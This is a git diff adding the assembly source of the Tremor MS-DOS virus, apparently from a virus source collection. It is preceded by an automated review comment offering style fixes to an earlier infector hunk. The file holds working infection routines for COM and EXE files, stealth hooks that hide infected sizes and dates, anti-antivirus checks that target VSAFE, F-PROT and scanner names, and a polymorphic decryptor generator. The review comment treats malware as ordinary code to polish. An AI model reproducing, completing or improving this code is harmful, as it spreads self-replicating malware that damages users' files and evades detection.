+CSEG ENDS
+ END START
+
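Review bot: Store_name hard-codes `mov si,158` twice with no comment on what 158 is; since the program runs with the default DTA at PSP offset 80h and the matched filename field at offset 9Eh (158 decimal), the constant should be named or at least annotated, e.g. `mov si,158 ;filename field of default DTA (PSP:9Eh)`. `SEARCH_ATTRIB DW 17H` is likewise an undocumented attribute mask; a comment such as `SEARCH_ATTRIB DW 17H ;match read-only, hidden, system and directory entries` would make the directory walk readable. `NUM_INFECT DW 0` is declared but never referenced anywhere in the hunk, which looks like a leftover from the Clonewar base the header mentions and could be dropped or documented.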
diff --git a/MSDOS/Virus.MSDOS.Unknown.tremor.asm b/MSDOS/Virus.MSDOS.Unknown.tremor.asm
new file mode 100644
index 00000000..1507ceaf
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tremor.asm
@@ -0,0 +1,2266 @@
+;--------------------------------------------------------------------------
+;--
+;-- TREMOR
+;--
+;-- you can reassemble it, but the cod will not run.
+;-- i have had no time to make it work (and there is no need for)
+;-- but you will see, how tremor works.
+;--
+;--------------------------------------------------------------------------
+paras_needed equ 10ch
+
+old__ds equ offset old__si-23
+old__es equ offset old__si-17
+old__ax equ offset old__si-12
+old__bx equ offset old__si-9
+old__cx equ offset old__si-6
+old__dx equ offset old__si-3
+old__di equ offset old__si+3
+old__bp equ offset old__si+6
+
+dtastruc struc
+ reserv db 15h dup (?)
+ attr db ?
+ time dw ?
+ date dw ?
+ fsize dd ?
+ fname db 13 dup (?)
+ends
+
+;--------------------------------------------------------------------------
+code_seg segment
+ assume cs:code_seg
+;-------------------------------------------------------------------
+ org 0 ; !!
+flag db ?
+ db 85h dup (?)
+;-------------------------------------------------------------------
+internal_21 dd ?
+ dd ?
+tremor_24 dd ?
+tremor_21 dd ?
+
+orig21 dd ?
+internal_15 dd ?
+tremor_15 dd ?
+tempdta:
+ xres db 15h dup (?)
+ xattr db ?
+ xtime dw ?
+ xdate dw ?
+ xsize dd ?
+ xfname db 13 dup (?)
+;------------------------------------------------------------
+extra dw ? ;
+;-------------------------------------------------------------------
+start: mov di,offset frstbyte+100h ; psp segment !!
+ and ax,ax +init_bx equ $+1 + mov bx,0 + mov cx,891h + push ds + pop es +locloop_3: xor [di],bx + sti + add bx,0 + sub di,-2 + loop locloop_3 + nop +frstbyte: jmp virinstall + db 0ebh,0bh + nop + nop + nop + jmp virinstall +;------------------------------------------------------------------- +virint21done: call getorigregs +loc_5: jmp toold21 + +virint21: cmp byte ptr cs:[BP_Flag],1 ; "disabled" + je loc_5 + + mov word ptr cs:[offset old__si],si + mov si,offset old__si + mov cs:[si+(offset old__ds-offset old__si)],ds + push cs + pop ds + mov ds:[si+(old__ax)],ax + mov ds:[si+(old__bx)],bx + mov ds:[si+(old__cx)],cx + mov ds:[si+(old__dx)],dx + mov ds:[si+(old__di)],di + mov ds:[si+(old__bp)],bp + mov ds:[si+(old__es)],es + + cmp byte ptr ds:[si+(offset flickerflag-offset old__si)],1 +psycholabel: jmp loc_8 + + add al,ah + and al,0fh + add ah,al + and ah,0fh + push ax + mov dx,3dah + in al,dx + pop bx + mov al,8 + mov ah,bl + mov dl,0d4h + out dx,ax + mov dl,0c0h + mov al,33h + out dx,al + mov al,bh + out dx,al + call getorigregs + push ax + xor cx,cx + mov al,0b6h + out 43h,al + mov cl,ah + shl al,1 + shl cx,1 + in al,61h + push ax + or al,3 + out 61h,al + +locloop_7: loop locloop_7 + + pop ax + out 61h,al + pop ax + +loc_8: cmp ah,57h ; get/set filestamp + je handlefkts + cmp ah,42h ; seek in file + je handlefkts + + cmp ah,3fh ; read file + db 74h ; JZ +disablhndchk db offset chkflhandl-offset $+2 + cmp ah,50h ; set psp + jb loc_9 + + cmp ah,6ch ; ext. create + jb loc_13 +loc_9: cmp ah,30h ; get dos-version.... + jne loc_11 ; normally 1st call of each prog ! + +chkflhandl: cmp bl,4 ; diskfile ? + ja handlefkts + +loc_11: cmp ah,3ch ; create/overwrite file + ja loc_12 + cmp ah,12h ; findnext /fcb + ja loc_13 +loc_12: cmp ah,0eh ; set curr. 
disk + ja handlefkts + +loc_13: jmp virint21done + +;------------------------------------------------------------- +; file-handle operations +;------------------------------------------------------------- +handlefkts: xor bx,bx + call checkforvsafe + mov byte ptr cs:[org4ad],cl + mov al,0 + call set_com_flag + + mov al,15h ; get int 15h + mov di,offset tremor_15 + call getint + mov di,offset internal_15 ; set int 15h + call setint + + mov al,21h ; get int 21h + mov di,offset tremor_21 + call getint + mov di,offset internal_21 ; set int 21h + call setint + + mov al,24h ; get int 24h + mov di,offset tremor_24 + call getint + + mov dx,posint24 + + push cs ; set int 24h + pop ds + call setint1 + + call getorigregs +;------------------------------------------------------------------- +; read file via handle +;------------------------------------------------------------------- + cmp ah,3fh + je fktreadhndl + jmp loc_24 + +fktreadhndl: jcxz loc_16 ; "nothing to do" + ; + mov ax,5700h ; get filestamp (infected..) + call performint21 + jc loc_16 ; error ->... bye + cmp dh,0c7h ; dh > c7 -> infected + ja loc_17 +loc_16: jmp chain + +loc_17: call readfirstbytes + jc loc_16 + call checkifinfected + jnz loc_16 + ; + call trem_popall + mov bx,word ptr cs:[filesize ] + mov dx,word ptr cs:[filesize+2] + call chkfilesize + ja loc_18 + + add bx,cx + adc dx,0 + call chkfilesize + jbe loc_19 + + sub bx,word ptr cs:[data_x01] + sub bx,cx + neg bx + push bx + jmp loc_20 + +loc_18: xor cx,cx +loc_19: push cx +loc_20: call getorigregs + pop cx + call performint21 + jc loc_23 + + pushf + push ax + push si + push di + push ds + push es + push ds + pop es + + push cs + pop ds + + mov di,word ptr ds:filesize + cmp word ptr ds:[di+3],0 ; check hi-word of filesize + ja loc_22 ; > 64kb -> bye + + cmp word ptr [di],18h ; check lo-word of filesize + jae loc_22 ; > 24 byte -> jmp + + mov ax,[di] ; ( error ?!?) 
+ mov di,dx + mov si,ax + add si,offset buffer + cmp cx,18h + jb loc_21 + sub ax,18h + neg ax + xchg ax,cx +loc_21: cld + rep movsb +loc_22: pop es + pop ds + pop di + pop si + pop ax + popf +loc_23: jmp loc_27 +;------------------------------------------------------------------- +; seek to end of file / handle +;------------------------------------------------------------------- +loc_24: cmp ax,4202h + jne loc_28 + + mov ax,5700h ; get timestamp + call performint21 + jnc loc_26 +chain: jmp chaintoint21 + +loc_26: cmp dh,200 ; dh < 0c8 -> not infected + jb chain + call readfirstbytes + jc chain + call checkifinfected + jnz chain + call trem_popall + pushf + sub dx,4000 ; seek to "real" end of file... + sbb cx,0 ; cx:dx ist position from eof + popf + call performint21 +loc_27: mov cx,word ptr cs:[old__cx] ; + jmp back +;------------------------------------------------------------------- +; get/set memblock +;------------------------------------------------------------------- +loc_28: db 0ebh +enablegetmem db offset loc_31-offset $+2 ; jmp short loc_31 + + cmp ah,4ah ; set mem-block + je loc_29 + cmp ah,48h ; get mem + jne loc_31 + +loc_29: call trem_popall + call performint21 + jnc back ; + cmp al,8 ; "out of memory" ! + jne back ; + sub bx,paras_needed ; amount of possible memory + stc ; to request... +back: jmp backtocaller +;------------------------------------------------------------------ +; findfirst / findnext via handle +;------------------------------------------------------------------ +loc_31: db 0ebh +enablehandle db 0 + + cmp ah,4eh + jb loc_37 + cmp ah,4fh + ja loc_37 + + call performint21 ; do it and check result.. 
+ pushf + push ax + jc goback + + call getdta ; -> dta=es:bx , + ; al = c8 + cmp byte ptr es:[bx.date+1],al ; + jb goback ; not infected + sub byte ptr es:[bx.date+1],al ; else "des"-infect + + mov si,1ah ; now : check size + +loc_32: cmp byte ptr es:[bx+si+2],0 ; low-byte of high-word + jne loc_33 ; always strip off + ; virussize between + ; 64kb and 1mb ?!? + + cmp word ptr es:[bx+si ],8192 ; minsize to infect + jb goback + +loc_33: sub word ptr es:[bx+si ],4000 ; vir-size.. + sbb word ptr es:[bx+si+2],0 + +goback: call trem_popall + pop ax +loc_35: popf + +backtocaller: retf 2 ; end of int 21h....... +;------------------------------------------------------------------- +; findfirst / findnext / fcb +;------------------------------------------------------------------- +loc_37: cmp ah,11h + jb xcreate + cmp ah,12h + ja xcreate + + call performint21 + pushf + push ax + cmp al,0ffh ; error + je goback + + call getdta ; al=c8 + cmp byte ptr es:[bx],0ffh ; extended fcb.. + jne loc_38 + add bx,7 +loc_38: cmp byte ptr es:[bx+1ah],al ; f-attribut..... + jb goback + sub byte ptr es:[bx+1ah],al ; stealth it + mov si,1dh + jmp loc_32 +;------------------------------------------------------------------- +; extended open / create / replace +;------------------------------------------------------------------- +xcreate: cmp ah,6ch + jne chkifopen + mov dx,si + jmp hopenfile +;------------------------------------------------------------------- +; open file / get handle +;------------------------------------------------------------------- +chkifopen: cmp ah,3dh + jne chkifclose + +hopenfile: inc word ptr cs:[random_1] + cmp al,2 ; open r/w ? + jne chkifclose + +des_infect_it: call clean__file ; ! 
interesting + jmp loc_50 +;------------------------------------------------------------------- +; close file / release handle +;------------------------------------------------------------------- +chkifclose: cmp ah,3eh + jne checkiftimestamp + + call performint21 ; perform close file + pushf + push ax ; result + jc readfhdone ; error -> nothing else to do + + call getflag_cs_00 ; get flag + cmp bl,al ; bl was filehandle + jne readfhdone + + call setflag_cs_00 ; al to flagpos + push cs + pop ds + mov dx,2 + call do_infect +readfhdone: jmp goback +;------------------------------------------------------------------- +; get/set files datetime +;------------------------------------------------------------------- +checkiftimestamp: + cmp ah,57h + jne call_checkfortremor + + cmp al,1 ; set timestamp + je issettime + + call trem_popall ; get timestamp........ + call performint21 + pushf + jc return2caller + cmp dh,200 + jb return2caller + sub dh,200 +return2caller: jmp loc_35 + +issettime: cmp dh,200 + jb isnot2000 + sub byte ptr cs:[old__dx],200 +isnot2000: call readfirstbytes + jc loc_50 + call seekbeginoffile + call infect_file + jc loc_50 + call sub_17 + call trem_popall + add dh,200 + call performint21 + pushf + sub dh,200 + jmp return2caller + +call_checkfortremor: + call checkfortremor +;------------------------------------------------------------------- +; programm-ende +;------------------------------------------------------------------- + cmp ah,4ch + jne loc_51 + ; + mov cs:[offset enablehandle],0 + mov cs:[offset disablhndchk],offset chkflhandl-offset disablhndchk+1 + ; +loc_50: jmp loc_55 +;------------------------------------------------------------------- +; exec +;------------------------------------------------------------------- +loc_51: cmp ah,4bh + je loc_52 + jmp loc_60 + +loc_52: call setflag_cs_00 ; al->cs:00 + cmp al,0 ; exec or load ovl ? 
+ je loc_53 ; = 0 -> exec + jmp des_infect_it + +loc_53: db 0ebh +watchfiles db 0 + + mov dx,-paras_needed ; 10ch + call GetTremMem; setzt 29dh auf 0 + + push cs + pop ds + + mov ds:[watchfiles ],offset loc_0053-offset loc_53+2 + mov ds:[enablegetmem],offset loc_31-offset loc_28+2 + mov ds:[enablehandle],0 + ; +loc_0053: call getorigregs + + call findfile ; + jc loc_55 + + cmp byte ptr cs:[tempdta],3 ; drive c: ? + jb loc_55 ; no, floppy + + mov ax,word ptr cs:[tempdta.fname] + cmp ax,4248h ; "HB"scan + je loc_54 + cmp ax,4c43h ; "CL"ean + je loc_54 + cmp ax,4353h ; "SC"an + jne loc_56 + +loc_54: call getorigregs + call clean__file ; !! + call setflag_cs_00 ; flag = -1 +loc_55: jmp chaintoint21 + +loc_56: push cs + pop es + mov di,offset specialfiles + mov cx,8 ; 8 filenames + cld + repne scasw + jnz loc_58 + + cmp ax,4843h ; "CH" + jne loc_57 + cmp word ptr cs:[tempdta.fname+2],444bh; "KD" + jne loc_57 ;------------------------ + ; else : chkdsk running ! + ;------------------------ + + mov byte ptr cs:[enablehandle],offset xcreate-offset loc_31+2 + +loc_57: call getrealmemorysize + mov byte ptr cs:[watchfiles],0 +loc_58: cmp word ptr cs:[tempdta.fname+1],4a52h; "RJ" + jne loc_59 + + mov byte ptr cs:[disablhndchk],offset handlefkts-offset disablhndchk+1 + + +loc_59: call getorigregs + jmp loc_61 +;------------------------------------------------------------------- +; get / set file-attribut +;------------------------------------------------------------------- +loc_60: cmp ah,43h + jne chaintoint21 ; + or al,al ; is it "get" + jnz loc_62 ; no -> jmp + ; + cmp bx,0faceh ; is it tremor who calls ? 
+ jne chaintoint21 ; no -> jmp + ;--------------------------------------------------- +loc_61: call checkif_com_file; zf = com-file + jnz loc_62 + mov al,1 + call set_com_flag + +loc_62: call getorigregs + call do_infect + +chaintoint21: call trem_popall + + cmp word ptr cs:[offset my_call],ax + jne toold21 +org_487 equ $+2 + mov ax,word ptr cs:[random_1] + iret + +toold21: jmp dword ptr cs:[internal_21] +;-------------------------------------------------------------------------- +; virus-s : +;-------------------------------------------------------------------------- +; get int in al to dword cs:di +;-------------------------------------------------------------------------- +getint: mov ah,35h + call performint21 + mov cs:[di],bx + mov word ptr cs:[di+2],es + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +resetints: mov al,15h ; set int 15h to cs:tremor_15 + mov di,offset tremor_15 + call setint + mov al,21h ; set int 21h to cs:tremor_21 + mov di,offset tremor_21 + call setint +org4ad equ $+1 + mov bl,81h + call checkforvsafe + mov al,24h ; set int 24h + mov di,offset tremor_24 + +setint: mov dx,cs:[di] + mov bx,word ptr cs:[di+2] + mov ds,bx + +setint1: mov ah,25h ; + +performint21: pushf + call dword ptr cs:[internal_21] + retn +;-------------------------------------------------------------------------- +getdta: mov ax,2fc8h ; set dta + jmp performint21 +;-------------------------------------------------------------------------- +getsetfattr: mov ah,43h ; + jmp performint21 +;-------------------------------------------------------------------------- +getsetfilesdatetime: + mov ah,57h ; get/set filestamp + jmp sethandlecall21 +;-------------------------------------------------------------------------- +read_first_32byte: + mov cx,-1 + mov dx,-32 ; cx:dx = -32 + mov al,2 + call seek ; seek from eof + +read_32: mov ah,3fh + mov cx,20h ; read last 32 
byte +setbuff: mov dx,offset buffer; filename/buffer + +tempfhandle equ $+1 + +sethandlecall21:mov bx,5 + jmp performint21 +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +writeexeheader: mov cx,18h +truncate: mov ah,40h ; write to file + jmp setbuff +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +opendestfile: mov bp,dx + mov al,0 + call getsetfattr ; get attr + jc loc_ret_72 + mov word ptr cs:[origfattr],cx + test cl,3 ; r/o or hidden ? + jz loc_71 ; no, jmp + mov al,1 + xor cx,cx ; set attr to "none" + call getsetfattr ; set attr + jc loc_ret_72 + +loc_71: mov ax,3d92h ; open file + call performint21 + jc loc_ret_72 + + mov word ptr cs:[tempfhandle],ax + mov al,0 ; get + call getsetfilesdatetime + mov word ptr cs:[origfdate],dx + mov word ptr cs:[origftime],cx +loc_ret_72: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +readfirstbytes: mov word ptr cs:[tempfhandle],bx +read32byte: mov al,1 + call seekinfile ; seek from current position + jc loc_74 + push ax + push dx + push ds + + push cs + pop ds + + mov word ptr ds:[filesize ],ax ; + mov word ptr ds:[filesize+2],dx + + call read_first_32byte ; buffer = ds:104dh + pop ds + pop cx + pop dx + jc loc_73 + cmp ax,20h ; read 32 byte ok ? + jne loc_73 + +seekstartoffile:mov al,0 ; ok. seek begin of file ! + jmp seek ; and return ! + +loc_73: call seekstartoffile ; and 2*return +loc_74: stc + retn + +sub_17: mov al,0 + +filesize equ $+1 + mov dx,0 ; dummy-code to save + mov cx,0 ; data (filesize). 
+seekbeginoffile: + xor ax,ax +seekinfile: xor cx,cx + mov dx,cx +seek: mov ah,42h ; seek + jmp sethandlecall21 +;-------------------------------------------------------------------------- +setinfectdate: mov al,1 ; set files date-time +origfdate equ $+1 + mov dx,0deafh +origftime equ $+1 + mov cx,2800h + call getsetfilesdatetime + mov ah,3eh ; close file + call sethandlecall21 + + call getorigregs +origfattr equ $+1 + mov cx,20h + mov al,1 + jmp getsetfattr +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkif_com_file: + mov di,dx + mov cx,80 + mov al,'.' ; serach for "." + push ds + pop es + cld + repne scasb + jnz loc_ret_78 + mov ax,[di] + or ax,6060h ; 4f43h or 6060h => 6f63h + cmp ax,6f63h ; 4f43h = "co" +loc_ret_78: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +do_infect: call checkforfprot + jz loc_82 + call opendestfile + jnc loc_79 ; no error -> jmp + cmp al,3 ; error = file not found ? + ja loc_80 ; yes -> return + retn + +loc_79: call readheader + jnc loc_80 + call add200toyear + call infect_file + +loc_80: jmp setinfectdate + +dontinfect: sub byte ptr cs:[1+origfdate],200 +loc_82: stc + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +infect_file: call checkifinfected + jz loc_82 + push cs + pop ds + call read_32 + jc dontinfect + + mov si,offset buffer + call test_com_flag + jnz loc_83 + + cmp byte ptr [si],0e9h ; long jmp + je loc_84 + mov al,0 + call set_com_flag + +loc_83: cmp word ptr [si],5a4dh ; 'MZ' + jne dontinfect + cmp word ptr ds:[si+18h],40h; start of reloc-table + je dontinfect ; 40h => *.dll ! 
+ ; it doesnt try to infect + ; windows and os/2-software + +loc_84: mov ax,ds:[si+10h] ; sp-init + cmp ax,2f0h ; + je dontinfect + + cmp ax,510h + jb loc_85 + + cmp ax,522h + jb dontinfect + +loc_85: call test_com_flag + jnz loc_86 ; ??! +loc_86: mov word ptr ds:[init_sp],ax + + mov ax,ds:[si+14h] ; get init-ip + call test_com_flag + jnz loc_87 + mov ax,ds:[si+1] + mov word ptr ds:[init_jump],ax + mov ax,100h +loc_87: mov word ptr ds:[init_ip],ax + call test_com_flag + jz loc_88 + + mov ax,word ptr ds:[si+4] ; nr of 512-pages + cmp ax,10h + jb dontinfect + dec ax + mov dx,512 + mul dx + add ax,word ptr ds:[si+2] ; add rest of file + adc dx,0 + push ax ; files size (without overlays !!) + push dx + +loc_88: mov al,2 + call seekinfile ; seek from eof + + mov ds:[si+18h],ax ; low filesize -> reloc-entry + mov ds:[si+1ah],dx ; high filesize + + call test_com_flag + jnz loc_90 + + or dx,dx ; file > 64kb (its a com-file !) + jnz skip_file + cmp ah,0d6h ; file > 54784 byte + ja skip_file + cmp ah,20h + jb skip_file ; file < 8192 byte + mov di,ax + sub di,3 + jmp loc_91 + +skip_file: jmp dontinfect + +loc_90: pop bp ; file-size + pop di + cmp ax,di + jne skip_file + cmp dx,bp + jne skip_file + cmp dx,0fh ; > 968kb ! 
+ ja skip_file + + mov di,ax + and di,0fh ; filesize mod 15 +loc_91: mov word ptr ds:[org_895],di + push di + mov cl,4 + shr ax,cl + ror dx,cl + add ax,dx + sub ax,ds:[si+8] + push ax + push ax + push ax + add ax,di + push ax + mov ah,2ah ; get system-date + call performint21 + + add dh,3 + cmp dh,0dh + jb loc_92 + sub dh,0ch + inc cx + +loc_92: mov word ptr ds:[org_ceeh],cx + mov word ptr ds:[org_ce8h],dx + mov ah,2ch + call performint21 ; get system-time + pop ax + add ax,cx + add ax,dx + neg ax + mov word ptr ds:[si+1ch],0deadh ;-) + mov word ptr ds:[si+1eh],ax + xor ax,0deafh + mov word ptr ds:[org_7e6],ax + mov word ptr ds:data_0109,ax + + call sub_29 + + mov word ptr ds:[org_8ee],ax + mov word ptr ds:[org_8df],bx + pop ax + sub ax,bx + sub ax,ds:[si+16h] + mov word ptr ds:[init_cs],ax + pop ax + sub ax,bx + sub ax,word ptr ds:[si+0eh] + mov word ptr ds:[init_ss],ax + shl bx,1 + mov word ptr ds:[org_883],bx + cld + + push si + push cs + pop es + ;--------------------------------------------------- + ; codemachine starts + ;--------------------------------------------------- + mov si,offset data_x01 + mov di,si + push si + lodsw ; data_x01:data_x02 -> bx:ax + xchg ax,bx + lodsw + xchg al,ah ; bx:ax=bhblahal -> bhblalah + xchg bl,bh ; blbhalah + xchg ah,bl ; ahbhalbl + xchg ax,bx ; bhahblal + stosw ;data_x01:data_x02 <- ax:bx + xchg ax,bx + stosw + ;--------------------------------------------------- + mov ah,2ch ; get sys-time + call performint21 + mov bp,cx + add bp,dx + mov bx,cx + mov cl,4 + shl bl,cl + and dh,0fh + or dh,bl + mov dl,bh + shl dl,cl + push dx + mov ah,2ah ; get sys-date + call performint21 + add bp,dx + neg bp + mov cx,dx + pop dx + or dl,al + mov di,offset extra + mov ax,bp + call sub_29 + mov word ptr ds:[org_8f5],ax + mov word ptr ds:[org_8a5],ax + mov word ptr ds:[org_8e6],bx + mov bx,word ptr ds:[random_1] + pop si + ;-----------------------------------( code-generator)--- + test dl,1 + jz loc_94 + mov al,26h ; es: + test ch,2 ; cx 
!=10.0000b = es: + jz loc_93 + mov al,6 ; push es + stosb + mov al,1fh ; pop ds +loc_93: stosb + +loc_94: lodsb + call sub_30 + lodsb + call sub_30 + lodsb + call sub_30 + lodsb + call sub_30 + + test dl,1 + jnz loc_97 + test bl,15h + jnz loc_95 + mov ax,71eh + stosw + jmp loc_97 + +loc_95: mov al,0f2h ; repnz + test ch,1 + jz loc_96 + inc ax ; repz +loc_96: stosb +loc_97: push di + sub si,4 + call test_com_flag + jz loc_98 + mov al,36h ; ss: + stosb +loc_98: mov al,31h + mov byte ptr ds:data_103,al ; xor [di],al + test dh,40h + jz loc_99 + mov byte ptr ds:data_103,1 ; add [di],ax + mov al,29h +loc_99: mov byte ptr ds:[org_1081],al ; sub [di],al + stosb + mov al,1ch ; sbb reg8bit,abs + test dh,2 + jz loc_100 + inc al ; sbb reg16bit,abs +loc_100: test cl,3 + jz loc_101 + sub al,8 ; adc reg16bit,abs +loc_101: stosb + call sub_32 + test bl,1 + jz loc_102 + call insertnearjmp + +loc_102: mov byte ptr ds:data_0108,5 ; add ax,xxxx + cmp ch,0ah + jb loc_103 + test cl,3 + jnz loc_103 + mov ax,5f8dh + stosw + xor ax,ax + mov al,bl + or al,40h + cbw + mov word ptr ds:data_0109,ax ; add ax,xxxx + stosb + jmp loc_106 + +loc_103: mov al,81h + stosb + mov al,0c3h + test cl,3 + jz loc_104 + dec ax +loc_104: test dl,2 + jz loc_105 + add al,30h + mov byte ptr ds:data_0108,35h +loc_105: stosb + +org_7e6 equ $+1 + mov ax,0f6f5h + stosw +loc_106: test bl,1 + jnz loc_107 + call insertnearjmp +loc_107: test dh,3 + jz loc_109 + call sub_32 + + mov al,83h ; sub si,-11 + stosb + mov al,0eeh + test dh,2 ; dh, bit 2 ="1" -> di + jz loc_108 + inc ax ; sub di,-11 +loc_108: stosb + mov al,0feh + stosb + jmp loc_111 + +loc_109: mov al,46h ; inc si + test dh,2 + jz loc_110 + inc ax ; inc di +loc_110: stosb + push ax + call sub_32 + pop ax + stosb +loc_111: call sub_32 + test bl,3 + jnz loc_112 + test dl,10h + jnz loc_112 + cmp ch,3 + ja loc_112 + mov al,0e2h + jmp loc_116 + +loc_112: mov al,49h ; dec cx + test dl,10h ; dl!=1000b = use cx + jz loc_113 ; dl =1000b = use bp + add al,4 ; dec bp 
+loc_113: test bl,3 + jz loc_114 + sub al,8 ; inc bp / inc cx +loc_114: stosb + call sub_32 + cmp ch,0ah + jb loc_115 + test cl,3 + jz loc_117 +loc_115: test dh,3 + jnz loc_117 + test dl,2 + jz loc_117 + mov al,77h +loc_116: jmp loc_118 + +loc_117: mov al,75h +loc_118: stosb + pop ax + dec ax + sub ax,di + stosb + test di,1 + jnz loc_120 + mov al,bl + and al,7 + or al,90h + cmp al,94h + jne loc_119 + inc ax +loc_119: stosb +loc_120: mov ax,0edh + sub ax,di + shr ax,1 + add ax,7b0h + mov ds:data_x02,ax +org_883 equ $+1 + add ax,0deh + test bl,3 + jz loc_121 + neg ax +org_88d equ $+1 +loc_121: mov word ptr ds:[init_bx],ax + mov ax,di + mov ds:data_x01,ax +org_895 equ $+1 + add ax,0c36ch + sub ax,offset extra + call test_com_flag + jnz loc_122 + add ax,103h + jmp loc_123 + +org_8a5 equ $+1 +loc_122: add ax,4f0h +org_8a8 equ $+1 +loc_123: mov word ptr ds:[extra+1],ax + + mov al,0e9h + stosb +len_of_jmp equ $+1 + mov ax,0cd5h + sub ax,di + stosw + pop si + call scramblebuffer + + mov al,2 + call seekinfile + call sub_58 + jnc loc_125 + +loc_124: pop ax + pop ax + jmp dontinfect + +loc_125: cmp ax,cx + jne loc_124 + call seekbeginoffile + call scramblebuffer + call test_com_flag + jnz buildexeheader + pop ax + pop ax + mov ds:[si+1],ax + jmp loc_127 + + +buildexeheader: pop ax + push ax +org_8df equ $+1 + sub ax,006fh + mov ds:[si+16h],ax ; cs_init + pop ax +org_8e6 equ $+1 + sub ax,004fh + mov ds:[si+0eh],ax ; ss_init + pop ax + push ax +org_8ee equ $+1 + add ax,06f0h + mov ds:[si+14h],ax ; ip_init + + pop ax +org_8f5 equ $+1 + add ax,04f0h ; = 1264 dec + ; + add ax,1080h ; = 4224 dec, sum=5488 dec + mov ds:[si+10h],ax ; sp_init + + mov ax,word ptr ds:[si+2] ; get lastbytes + add ax,4000 + cwd ; = xor dx,dx + mov bx,200h + div bx + add word ptr ds:[si+4],ax ; nr of pages + mov word ptr ds:[si+2],dx ; lastbytes +loc_127: jmp writeexeheader +;-------------------------------------------------------------------------- +; 
+;-------------------------------------------------------------------------- +readheader: call read32byte +chkdate200: mov al,byte ptr cs:[origfdate+1] + mov ah,200 + cmp al,ah + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +add200toyear: add al,ah + mov byte ptr cs:[origfdate+1],al + retn +;-------------------------------------------------------------------------- +test_com_flag: cmp byte ptr cs:[com_flag],1 + retn +;-------------------------------------------------------------------------- +set_com_flag: mov byte ptr cs:[com_flag],al + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +sub_29: mov cl,4 ; ax = 1234h -> ax=0230h + and ax,0ff0h ; bx=0023h + mov bx,ax ; cl=4 + shr bx,cl + retn +;-------------------------------------------------------------------------- +; code-generator +; +; oh god ! +; why does somebody, that can write such a machine, waste his time +; writing the virus around ?? i'll never understand it. 
+; +;-------------------------------------------------------------------------- +sub_30 proc near + push ax + mov ah,bl + and ah,3 + cmp al,ah + jne loc_130 + test dl,1 + jz loc_128 + mov al,85h ; test + jmp loc_129 + +loc_128: mov al,23h + test cl,2 + jz loc_129 + mov al,0bh ; or + +loc_129: mov ah,0c0h + stosb + mov al,bl + and al,7 + add al,ah + stosb +loc_130: pop ax + cmp al,3 + je loc_ret_139 + cmp al,2 + je loc_136 + cmp al,1 + je loc_133 + call test_com_flag + jz loc_131 + cmp bl,6 + ja loc_131 + mov al,8dh + stosb + mov al,1eh + test cl,3 + jz loc_132 + mov al,16h + jmp loc_132 +loc_131: mov al,0bbh + test cl,3 + jz loc_132 + dec ax +loc_132: stosb + mov ax,bp + mov word ptr ds:init_ip,ax + stosw + retn + +loc_133: call test_com_flag + jz loc_134 + + cmp bl,0fch + jb loc_134 + + mov al,8dh ; 8d 36 -> lea si,offset + stosb + mov al,36h + test dh,2 + jz loc_135 + mov al,3eh ; 8d 3e -> lea di,offset + jmp loc_135 + +loc_134: mov al,0beh ; 8d be -> lea di,[bp+...] + test dh,2 + jz loc_135 + inc ax ; 8d bf -> lea di,[bx+...] 
+loc_135: stosb + mov word ptr ds:[org_8a8],di + stosw + retn + +loc_136: call test_com_flag + jz loc_137 + test bh,5 + jz loc_137 + mov al,8dh ; 8d 0e -> lea,cx,[xxxx] + stosb + mov al,0eh ; + test dl,10h + jz loc_138 + mov al,2eh ; 8d 2e -> lea bp,[xxxx] + jmp loc_138 + +loc_137: mov al,0b9h ; mov al,"mov cx,xxxx" + test dl,10h + jz loc_138 + mov al,0bdh ; mov al,"mov bp,xxxx" +loc_138: stosb + mov word ptr ds:[org_88d],di + stosw + +loc_ret_139: retn +sub_30 endp +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +insertnearjmp: test ch,3 + jnz loc_ret_140 + xor ax,ax + mov al,bl + and al,7 + add al,78h ; 78..7f -> near jmp + stosw +loc_ret_140: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +sub_32: lodsb + test ch,2 + jz loc_143 + cmp al,1 + jne loc_ret_142 + mov al,0fch ; mov al,'cld' + test dh,80h + jz loc_141 + dec ax ; mov al,'sti" +loc_141: stosb +loc_ret_142: retn + +loc_143: cmp al,3 + jne loc_ret_142 + mov al,90h ; mov al, "nop" + test dh,80h + jz loc_144 + mov al,2eh ; mov al,"cs:" +loc_144: stosb + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +findfile proc near + push dx + push ds + push es + push bx + + mov ah,2fh ; get dta + call performint21 + push bx + push es ; es:bx = dta + + push ds ; ds:dx remains constant + push dx + + mov ah,1ah + push cs + pop ds + mov dx,offset tempdta ; set dta + call performint21 + + pop dx ; + pop ds + mov cx,27h ; anyfile + mov ax,4e00h ; find first + call performint21 + pop ds + pop dx + + pushf + mov al,byte ptr cs:[tempdta.date+1] + mov ah,1ah ; re-set dta + call performint21 + popf + + pop bx + pop es + pop ds + pop dx + retn +findfile endp 
+;-------------------------------------------------------------------------- +; desinfecting open files +;-------------------------------------------------------------------------- +clean__file: call checkforfprot + jz loc_145 + call findfile + jc loc_145 + + cmp al,200 ; = hibyte of files date + jb loc_145 + + call opendestfile + jnc loc_146 ; no err -> jmp + cmp al,3 ; error = file not found ? + ja loc_149 ; no -> jmp +loc_145: stc ; else return + retn + +loc_146: call chkdate200 + jc loc_149 + call readheader + jc loc_147 + neg ah + call add200toyear ; but here : "sub".. + +loc_147: call checkifinfected + jnz loc_149 + + push ds + push es + ; + push cs + pop es + mov si,bp + mov di,2 + call getflag_cs_00 + cmp al,0ffh + jne loc_148 + + mov ah,60h ; get truename + call performint21 ; to es:di + mov word ptr es:[di-2],bx + +loc_148: pop es + pop ds + call desinfect +loc_149: jmp setinfectdate +;-------------------------------------------------------------------------- +; desinfect physically +;-------------------------------------------------------------------------- +desinfect: push cs + pop ds + call writeexeheader + mov dx,word ptr ds:[data_x01] + 